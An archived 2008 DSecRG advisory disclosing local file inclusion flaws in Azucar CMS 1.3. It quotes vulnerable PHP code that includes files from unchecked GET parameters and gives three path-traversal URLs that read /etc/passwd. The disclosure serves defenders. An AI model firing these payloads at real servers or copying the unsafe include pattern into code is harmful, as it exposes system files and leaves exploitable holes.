Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx1738.htm

Azucar CMS 1.3 multiple LFI ]



Multiple LFI in Azucar CMS 1.3
Multiple LFI in Azucar CMS 1.3




Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-012


Application:                    Azucar CMS
Versions Affected:              1.3
Vendor URL: http://azucarcms.sourceforge.net/en_home.htm 
Bug:                            Multiple Local File Include
Exploits:                       YES
Reported:                       30.01.2008
Vendor Response:                NONE
Date of Public Advisory:        05.02.2008
Authors:                        Alexandr Polyakov, Stas Svistunovich
                                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Azucar CMS has Multiple Local File Include vulnerabilities.


1. Local File Include vulnerabilities found in scripts index.php and index_sitios.php

Code
****
#################################################

if (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW]))
    include($_GET[_VIEW]);
else
    header("Location: html/sitio/");

#################################################

Example: 

http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd 


2. Local File Include vulnerability found in script src/sistema/vistas/template/tpl_inicio.php

Code
****
#################################################

$vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO . 'vistas/index.php';

include($vista); 

#################################################

Example:

http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd 


3. Local File Include vulnerability found in script html/sitio/index.php

Code
****
#################################################

if (isset($_GET[_VIEW])) {
        if (!file_exists($_GET[_VIEW])) {
                $vista_array = explode('/', $_GET[_VIEW]);
                $vista = $vista_array[0] . '/es_ES/' . $vista_array[2];
        } else
                $vista = $_GET[_VIEW];
}

$vista = (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW])) ? $vista : PATH_PROYECTO . 'vistas/es_ES/index.php';
include($vista);

#################################################

Example:

http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd 



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
http://www.dsec.ru (in Russian) 



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH